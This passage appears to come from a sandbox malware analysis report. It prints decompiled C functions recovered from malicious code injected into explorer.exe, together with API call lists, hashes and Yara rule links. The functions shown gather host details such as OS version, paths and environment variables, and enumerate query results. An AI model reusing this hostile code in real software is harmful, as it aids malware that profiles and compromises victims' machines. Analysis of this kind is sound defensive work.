        • Instruction ID: 1444dde37cf9ff6e32baa45f932119c6418e42d8efec47e869b3358f31e80b18
        • Opcode Fuzzy Hash: 6c71d26ea1c7d67146cd9b950da2090079754ff8c0595719dac4e2876920f872
        • Instruction Fuzzy Hash: A2F06931A10208EFDF60EBA0C986FAE77F8EB04399F1140A9B441EB151DB74DE009B61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5CEC, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C5CEC(void* __ecx, void* __eflags, void* __fp0) {
				void _v44;
				signed int _t8;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t21;
				void* _t24;
				void* _t29;
				void* _t35;

				_t35 = __eflags;
				_t24 = __ecx;
				_t8 =  *0xde688; // 0xf0000
				E000D249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E000C85EF();
				E000C8F78();
				 *0xde780 = 0;
				 *0xde784 = 0;
				 *0xde77c = 0;
				E000C5EB6(); // executed
				E000CCF84(_t24);
				_t14 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
				_t15 =  *0xde688; // 0xf0000
				E000CA86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
				E000CB337( &_v44);
				memset( &_v44, 0, 0x27);
				E000C5C26( &_v44, __fp0);
				_t21 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
				return 0;
			}











        0x000c5cec
        0x000c5cec
        0x000c5cef
        0x000c5cfe
        0x000c5d03
        0x000c5d08
        0x000c5d0f
        0x000c5d15
        0x000c5d1b
        0x000c5d21
        0x000c5d26
        0x000c5d2b
        0x000c5d33
        0x000c5d3d
        0x000c5d4b
        0x000c5d53
        0x000c5d5f
        0x000c5d67
        0x000c5d6c
        0x000c5d72
        0x000c5d7c

        APIs
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000CCF84: GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
          • Part of subcall function 000CCF84: GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
          • Part of subcall function 000CCF84: memset.MSVCRT ref: 000CCFE2
          • Part of subcall function 000CCF84: GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
          • Part of subcall function 000CCF84: GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
          • Part of subcall function 000CB337: CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        • memset.MSVCRT ref: 000C5D5F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 4245722550-0
        • Opcode ID: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction ID: af213eb193222f81b8a95cd20b2ee53c4ca132bbc1b9434b2fcea704800a8989
        • Opcode Fuzzy Hash: fa89a80829d7a9760737cc4274533f209aa92eb7a2269d63f0a7b72384ce7043
        • Instruction Fuzzy Hash: 78011D715022549FF600FBA8DC8AEDD3BE4EF29350F45006AF8049B263DB74A545CBB6
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C861A, Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C861A(int _a4, intOrPtr _a8) {
				int _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E000CC392(_t9);
						}
					} else {
						_t4 = E000CC379(_t9);
					}
					E000C874F(_t9, 0, _t4);
					_t3 = HeapFree( *0xde768, 0, _t9); // executed
				}
				return _t3;
			}






        0x000c861d
        0x000c8622
        0x000c8668
        0x000c8668
        0x000c8625
        0x000c8629
        0x000c862b
        0x000c862e
        0x000c8634
        0x000c8642
        0x000c8646
        0x000c8646
        0x000c8636
        0x000c8637
        0x000c863c
        0x000c864f
        0x000c8660
        0x000c8660
        0x00000000

        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction ID: bdf107fd91a53e23c3bc046cb1b94fcf4e343da30d7e73e1e878ef7509521b23
        • Opcode Fuzzy Hash: 29d119adc27ebfcbbca3d09bb5a218d10cee232c1cd15d8c43ca6c796faa6935
        • Instruction Fuzzy Hash: 94F0A031502624AFEA616B24EC01FAE37889F02B30F24C209F818AA1E1DF309D0087ED
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA77D, Relevance: 1.3, APIs: 1, Instructions: 29COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000CA77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E000CA5F7(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E000CA65C(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						CloseHandle(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








        0x000ca786
        0x000ca787
        0x000ca78c
        0x000ca790
        0x000ca79f
        0x000ca7a7
        0x000ca7b4
        0x00000000
        0x000ca7b7
        0x000ca7ab
        0x00000000
        0x000ca7ab
        0x00000000

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction ID: 530dcad075266c1156e77377669d94ddcef453a396c3f42a45d0ff379d1e2d4c
        • Opcode Fuzzy Hash: 2e382b22e81275347063f2f55ddbba12819f7fbba9436c0590232eb544ecab76
        • Instruction Fuzzy Hash: 55E09B3530861D6B8B2157A8AC50E9E3765AF4A77C7114716FD258F2D1CA30D84042D2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C98A6, Relevance: 1.3, APIs: 1, Instructions: 27COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C98A6(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E000CA4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
					CloseHandle( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E000C984A(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




        0x000c98aa
        0x000c98bc
        0x000c98ca
        0x000c98d7
        0x000c98da
        0x000c98e1
        0x000c98e1
        0x00000000
        0x000c98e6
        0x00000000

        APIs
        • CloseHandle.KERNELBASE(?), ref: 000C98CA
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
        • Instruction ID: 761c44297c6940bc27b2f576ce9d72b8e9fb3a67907d93a40376c24e364c2c1d
        • Opcode Fuzzy Hash: 3630957e612100f342e4842c6b5e58546f75cb5bc4260129e5d56011a5f31b81
        • Instruction Fuzzy Hash: E0F0A030300B009BC720AF22E848E5BBBE9EF56350700882DE986879A2DB35F8099790
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CB337, Relevance: 1.3, APIs: 1, Instructions: 25COMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E000CB337(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xde684; // 0x64f8f0
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xde684; // 0x64f8f0
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					CloseHandle(_t12);
					return _t13;
				}
				return _t5;
			}








        0x000cb337
        0x000cb33f
        0x000cb344
        0x000cb34a
        0x000cb34e
        0x000cb350
        0x000cb355
        0x000cb35e
        0x000cb362
        0x000cb362
        0x000cb36a
        0x00000000
        0x000cb36d
        0x000cb371

        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,000C3C8A,?,?,?,?,?,?,?,?,000C3D6F,00000000), ref: 000CB36A
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction ID: 952f55d8802c1bf5a37f67cca09105c85e7c47fe1d2e413aeb41e2f7cc7b4704
        • Opcode Fuzzy Hash: 34c13cd0fe4e9c133c3b9b320e777d7b51e1db3172c1e3d0fe4fb5bf720220e4
        • Instruction Fuzzy Hash: B2E04F32301160ABD6606B69EC8CF6B7BA9FB99A91F06016DF905CB151CB24C802C7B1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 000CD01F, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 282COMMON
        Download Yara Rule
        C-Code - Quality: 86%
        			E000CD01F(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				char _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				char _t115;
				signed int _t117;
				char _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				char _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0xde69c; // 0x10000000
				_t81 = E000C8604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0xde684; // 0x64f8f0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E000D2301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E000C8FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E000CBA05();
				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
				_t178 =  *_t88;
				if(E000CBB8D( *_t88) == 0) {
					_t90 = E000CBA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220
				 *((intOrPtr*)(_t222 + 0x218)) = E000CE3F1(_t12);
				 *((intOrPtr*)(_t222 + 0x21c)) = E000CE3B6(_t12);
				_push( &_v16);
				 *(_t222 + 0x224) = _t162;
				_push( &_v8);
				_v12 = 0x80;
				_push( &_v692);
				_v8 = 0x100;
				_push( &_v12);
				_t22 = _t222 + 0x114; // 0x114
				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
				_t95 =  *0xde68c; // 0x64fab8
				_push(0);
				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
					GetLastError();
				}
				_t97 =  *0xde694; // 0x64fa48
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E000C8FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114
				_t103 = E000CB7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E000CB67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E000C8FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E000CD400(_t43, E000CC379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E000CB88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess();
				 *((intOrPtr*)(_t222 + 0x101c)) = E000CBBDF(_t110);
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0xde684; // 0x64f8f0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E000C95E1(_t199, 0x10c);
				_t200 =  *0xde684; // 0x64f8f0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E000C85D5( &_v8);
				_t124 =  *0xde684; // 0x64f8f0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E000C9640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0xde684; // 0x64f8f0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0xde684; // 0x64f8f0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0xde684; // 0x64f8f0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0xde684; // 0x64f8f0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E000D2301(E000CD400(_t75, E000CC379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E000D22D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E000C902D(1, _t79, 0x14, 0x1e,  &_v2680);
				 *((intOrPtr*)(_t222 + 0x1898)) = E000CCD33(_t79);
				return _t222;
			}



















































        0x000cd01f
        0x000cd029
        0x000cd035
        0x000cd03a
        0x000cd03f
        0x000cd3ff
        0x000cd3ff
        0x000cd04c
        0x000cd052
        0x000cd057
        0x000cd05d
        0x000cd06d
        0x000cd079
        0x000cd079
        0x000cd082
        0x000cd088
        0x000cd08a
        0x000cd093
        0x000cd093
        0x000cd09f
        0x000cd0a3
        0x000cd0a8
        0x000cd0ae
        0x000cd0b7
        0x000cd0c5
        0x000cd0cc
        0x000cd0d1
        0x000cd0d1
        0x000cd0d2
        0x000cd0b9
        0x000cd0b9
        0x000cd0b9
        0x000cd0d8
        0x000cd0e3
        0x000cd0f1
        0x000cd0f7
        0x000cd0fb
        0x000cd101
        0x000cd108
        0x000cd10f
        0x000cd113
        0x000cd11a
        0x000cd11b
        0x000cd128
        0x000cd12a
        0x000cd12f
        0x000cd13c
        0x000cd13e
        0x000cd13e
        0x000cd140
        0x000cd14a
        0x000cd156
        0x000cd166
        0x000cd16c
        0x000cd172
        0x000cd174
        0x000cd185
        0x000cd18b
        0x000cd191
        0x000cd196
        0x000cd19c
        0x000cd1a2
        0x000cd1a7
        0x000cd1ac
        0x000cd1ac
        0x000cd1b2
        0x000cd1b2
        0x000cd1bb
        0x000cd1c7
        0x000cd1cf
        0x000cd1d3
        0x000cd1d3
        0x000cd1cf
        0x000cd1d7
        0x000cd1dd
        0x000cd1e3
        0x000cd1ea
        0x000cd1fb
        0x000cd201
        0x000cd209
        0x000cd210
        0x000cd223
        0x000cd229
        0x000cd22e
        0x000cd231
        0x000cd234
        0x000cd23a
        0x000cd240
        0x000cd242
        0x000cd248
        0x000cd251
        0x000cd254
        0x000cd254
        0x000cd257
        0x000cd25f
        0x000cd26a
        0x000cd270
        0x000cd261
        0x000cd263
        0x000cd263
        0x000cd279
        0x000cd279
        0x000cd27f
        0x000cd287
        0x000cd292
        0x000cd297
        0x000cd29d
        0x000cd29f
        0x000cd2ac
        0x000cd2ad
        0x000cd2ae
        0x000cd2b9
        0x000cd2bb
        0x000cd2c2
        0x000cd2c2
        0x000cd2cc
        0x000cd2d1
        0x000cd2d6
        0x000cd2d6
        0x000cd2dc
        0x000cd2e3
        0x000cd2e4
        0x000cd2f1
        0x000cd304
        0x000cd309
        0x000cd30e
        0x000cd317
        0x000cd317
        0x000cd31d
        0x000cd322
        0x000cd328
        0x000cd32e
        0x000cd333
        0x000cd33c
        0x000cd33e
        0x000cd345
        0x000cd345
        0x000cd34b
        0x000cd353
        0x000cd358
        0x000cd359
        0x000cd35e
        0x000cd367
        0x000cd369
        0x000cd374
        0x000cd374
        0x000cd37d
        0x000cd385
        0x000cd38c
        0x000cd391
        0x000cd3a0
        0x000cd3b8
        0x000cd3bf
        0x000cd3cd
        0x000cd3df
        0x000cd3e6
        0x000cd3f3
        0x00000000

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetCurrentProcessId.KERNEL32 ref: 000CD046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000CD082
        • GetCurrentProcess.KERNEL32 ref: 000CD09F
        • GetLastError.KERNEL32 ref: 000CD13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000CD16C
        • GetLastError.KERNEL32 ref: 000CD172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000CD1C7
        • GetCurrentProcess.KERNEL32 ref: 000CD20E
        • memset.MSVCRT ref: 000CD229
        • GetVersionExA.KERNEL32(00000000), ref: 000CD234
        • GetCurrentProcess.KERNEL32(00000100), ref: 000CD24E
        • GetSystemInfo.KERNEL32(?), ref: 000CD26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000CD287
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
        • Instruction ID: bb5fc8c38e6f26cdcc8b067c3c65418d8cefabbea5c8d39083ed8debe4d40b99
        • Opcode Fuzzy Hash: 37bcc01c9bc94b24e7331b634080c8e5ad094a8be6c0a042994241c4e1bd66b4
        • Instruction Fuzzy Hash: A1B14C71600744ABE710EB74DD89FEE77E8EF58340F00446EF95AD7292EB74AA448B21
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CDB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 50%
        			E000CDB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E000CD523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000C8604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000C861A( &_v60, 0xfffffffe);
					E000CD5D7( &_v104);
					return _t320;
				}
				_t165 = E000C95E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000C95E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000C92E5(_t165);
				_v60 = _t322;
				E000C85D5( &_v52);
				E000C85D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000C95E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000C85D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000C861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000C91E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000C91E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E000C8698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000C8604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000C861A(_t136, 0);
								E000C861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000C91E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000C95E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000C95E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000C85D5( &_v92);
											E000C85D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E000C9640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
